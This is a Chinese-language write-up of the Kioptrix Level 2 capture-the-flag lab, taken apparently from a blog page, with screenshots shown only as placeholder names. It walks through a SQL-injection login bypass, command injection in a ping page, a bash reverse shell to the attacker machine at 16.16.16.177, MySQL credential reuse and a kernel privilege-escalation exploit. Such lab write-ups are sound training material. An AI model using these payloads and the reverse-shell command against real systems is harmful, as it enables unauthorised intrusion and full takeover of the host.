Kioptrix Level 2-writeup

Kioptrix Level 2-writeup

0x00 信息收集

目标机器16.16.16.178
kali攻击机16.16.16.177

使用nmap来个端口服务扫描

image-20200819182450574

浏览器打开http://16.16.16.178看看

image-20200819182646519

第一眼看上去就像是存在SQL注入,抓包跑了下果然是存在万能密码的

image-20200819183517827

0x01 漏洞利用

以账号'0 or 1=1 #和任意密码就可以成功登录,登录后的页面是这样,感觉是存在一个任意命令执行的漏洞

image-20200819183651609

ping了下路由

image-20200819183803437

直接使用命令管道符连接命令可以执行任意命令

image-20200819184037164

kali使用nc -lvp 1234监听,直接bash -i >& /dev/tcp/16.16.16.177/1234 0>&1拿shell

image-20200819184705098

image-20200819184827303

不过是个低权限,需要提权

0x02 提权

image-20200819191803956

将shell升级一下python -c 'import pty; pty.spawn("/bin/bash")'

登录mysql

mysql -u john -phiroshima

在mysql数据库的user表找到了mysql的root密码hash

image-20200819201054129

在线查一下是hiroshima

使用root登录mysql

mysql -u root -phiroshima

image-20200819201226963

mysql的root权限是受限的,本来还准备使用system cat /etc/shadow查看下hash值。

只能从别的地方找下线索

从数据库webapp的user表找到web登录界面的账号密码。

image-20200819224411601

试了下ssh,发现密码不对。

思绪一下断了……

突然想到还可以从exp入手呀,赶紧看看版本

uname -a 
lsb_release -a

image-20200819224619794

image-20200819224648964

那就选这个9542吧

在shell下找个可以读写的

image-20200819224956845

获取到root权限。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值